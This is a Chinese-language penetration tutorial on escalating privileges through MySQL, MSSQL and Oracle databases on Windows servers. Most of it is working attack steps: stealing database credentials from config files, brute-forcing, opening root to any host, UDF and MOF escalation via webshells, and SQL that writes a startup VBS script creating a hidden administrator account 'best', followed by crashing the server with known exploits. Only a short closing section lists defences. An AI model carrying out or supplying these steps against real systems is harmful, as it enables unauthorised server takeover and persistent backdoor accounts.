一：如何获取mysql账号密码

1.查看网站配置文件

如:conn、config、data、sql、common、inc等。

可以直接右键编辑查看文件内容  获取mysql账号密码

2.查看数据库安装路径下的mysql文件 

安装目录为/data/mysql/user.myd和user.myi

将黄色方框内的文件下载到本地 用文本编辑器打开就可以看到明文账号和md5加密后的密码

直接去cdm5就可以解密

3.通过暴力破解得到

hscan、Bruter、hydra、脚本木马（爆破mysql密码需要mysql开启远程链接）

登录到mysql中，为root进行远程访问的授权，执行下面的命令： 

mysql>GRANT ALL PRIVILEGES ON *.* TO root@"%" IDENTIFIED BY"root";

mysql>flush privileges; 

第一句中"%"表示任何主机都可以远程登录到该服务器上访问。如果要限制只有某台机器可以访问，将其换成相应的IP即可，如：GRANT

ALL PRIVILEGES ON *.* TO root@“%" IDENTIFIED BY "root";第二句表示从mysql数据库的grant表中重新加载权限数据。因为MySQL把权限都放在了cache中，所以在做完更改后需要重新加载。

二：UDF提权

需要配合提权工具进行提权

需要先开启MySQL root 账号的远程登陆权限  这里如果之前开启了就从网站配置文件里面找，如果手动开启的话，开启后的root对应的密码就是默认的密码  root  并不是网站配置文件里面的那个密码，这个不知道是为啥，我开启之后怎么链接也连接不上  然后看了下数据库  有一个密码和其他的不同

开启好之后直接用工具连接

登录成功后去  C:\phpStudy\MySQL\lib\plugin\  这里用菜刀或者大马创建文件夹   plugin

这里直接在虚拟机里面创建了

把导入的目录配置好   点击执行   下面sql命令那里面就会有sql命令  

想用哪个就创建哪个函数

提权成功

脚本提权

主要解决MySQL无法远程登录问题

使用菜刀或者webshell将提权脚本上传到服务器

输入MySQL的账号和密码 连接上  使用脚本提权就不需要再开启MySQL的远程登录  直接使用网站配置文件里面找到的账号密码连接就可以

这个也是  先创建plugin目录  然后直接导出udp就可以

直接可以运行管理员命令 

提权成功

三：MOF漏洞提权

1.直接通过工具创建新的账号进行提权

2.手工通过webshell数据库语句创建账号

 1.找个可写目录，上传mof文件

 2.执行sql

select load_file('C:\\wmpub\\moon.mof') into dumpfile 'c:/windows/system32/wbem/mof/moon.mof';

注意新建的帐号每隔5分钟就会新建帐号，删除帐号的办法如下：

第一 net stop winmgmt 停止服务，

第二 删除文件夹：C:\WINDOWS\system32\wbem\Repository\

第三 net start winmgmt 启动服务

第四：完毕不会在执行了。

C:\WINDOWS\system32\wbem\Repository\ 放的是储存库　我们执行的.mof都会被加入到这个库了。

然后一直按脚本设置的时间执行。。

删除后　重新启动　会重建个默认储存库　这样我们先前执行mof就没了。

四：Mysql启动项提权

1.通过MySQL数据库命令写入VBS脚本

2.直接通过Webshell的Mysql写入启动项

3.通过MS12-020、MS15-034重启服务器

mysql>drop database test1;

mysql> create database test1;

mysql> use test1;

mysql> create table a (cmd text);

mysql>insert into a values ("set wshshell=createobject (""wscript.shell"")");

mysql>insert into a values ("a=wshshell.run (""cmd.exe /c net user

best best /add"",0)");

mysql>insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup Administrators best

/add"",0)");

注意双引号和括号以及后面的“0”一定要输入！我们将用这三条命令来建立一个VBS的脚本程序！

mysql>select * from a;

mysql>select * from a into outfile

"c://docume~1//administrator//「开始」菜单//程序//启动//best.vbs";

最后通过溢出漏洞让服务器重启，如：MS12-020、MS15-034

五：mssql数据库提权

mssql提权主要分为弱口令与溢出两类提权。目前主要通过弱口令连接直接提权，溢出类Mssql数据库几乎很少见。

工具下载地址：https://www.jb51.net/database/553302.html

直接使用工具可以提权  可以使用工具恢复xp_cmdshell执行系统命令

六：Oracle提权

直接使用工具提权

也可以参照网络文章  http://wenku.baidu.com/link?url=DAU-gUL4EpfniDqH3TV4lvQ4W9HRRm-sWCzFqVNJWSnBgfCfm0iu-6DunEAcFgI0STlvJCgNgbq2BwPalWIcaptP72SDTcq77BtpRRvPSGG

七：安全防御

1、限止数据库远程连接，给数据库帐户设置密码必须>8位以上并数字+字母+特殊符号等。

2、不要给网站配置root或SA权限。必须给每个网站独立分配数据库帐户并限格控制好权限。

3、及时升级数据库补丁。

4、安装Waf进行防御。

5、购买数据库审计设备